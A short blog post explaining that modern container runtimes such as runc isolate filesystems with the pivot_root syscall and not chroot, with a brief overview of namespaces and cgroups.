November 10, 2022

Modern containers don't use chroot (updated)

A tiny explanation of how containers work. Updated November 11, 2022.

What is chroot?

chroot is a Linux syscall that changes the root directory of a process. It is widely believed that containers are implemented using chroot. This is wrong, but it does make sense. If you run ls inside a container, you only see files from that container. chroot is more than capable of making that happen.

I too used to think that containers use chroot.

But now I know better.

What does the source code say?

If containers were implemented with chroot, you'd expect container runtimes to call chroot in their source code.

So I searched runc's code for chroot.

Hmm, it does appear there after all. Sixth line from the top:

But a closer look reveals that chroot isn't usually called! The highlighted code runs instead. (Normally configs.NEWNS is true.)

What is in that highlighted code? A mysterious function called pivotRoot.

pivot_root vs chroot

pivotRoot is a wrapper for the Linux syscall pivot_root. What is pivot_root then? Basically, chroot++.

But what's wrong with chroot? For starters, it's trivial for a rogue processes to undo a chroot. It just needs to call chroot again and reverse the first call. Whoops. Isolation broken.

There are actually workarounds for that - which still use chroot - but like the man-page says, chroot "is not intended to be used for any kind of security purpose."

pivot_root on the other hand, is designed for that.

With pivot_root you can jail a set of processes inside a directory properly. And that's a must for containers.

For a deep dive on chroot vs pivot_root, see this post from tbhaxor.

What are containers, really?

A container at runtime is:

  1. Linux namespaces to isolate resources. (pivot_root works on mount namespaces. Containers also use network namespaces, pid namespaces, and more.)
  2. cgroups to limit resource usage or distribute it fairly between containers. (This is what CPU limits and requests get translated to. But remember, your Kubernetes needs no limits!)

Matt Rickard recently covered cgroups and namespaces. Earthly did a deep dive on filesystem isolation, albeit they made the very mistake this post is about. I've talked about chroot on LinkedIn too.

What are containers... at build-time?

Surprisingly, to build a container you must run a container! At least traditionally. More on that in a future post.

What are containers... when they're inside a registry?

Compressed and layered filesystems with some metadata.

I think. Haven't dealt with that area much.

Questions? Comments?

Yes, please. I'm on LinkedIn and Twitter.

Also, Robusta.dev just got a major update. If you're tired of noisy and unclear Kubernetes alerts, check it out. Best for people who like Prometheus.

Subscribe to receive articles directly in your inbox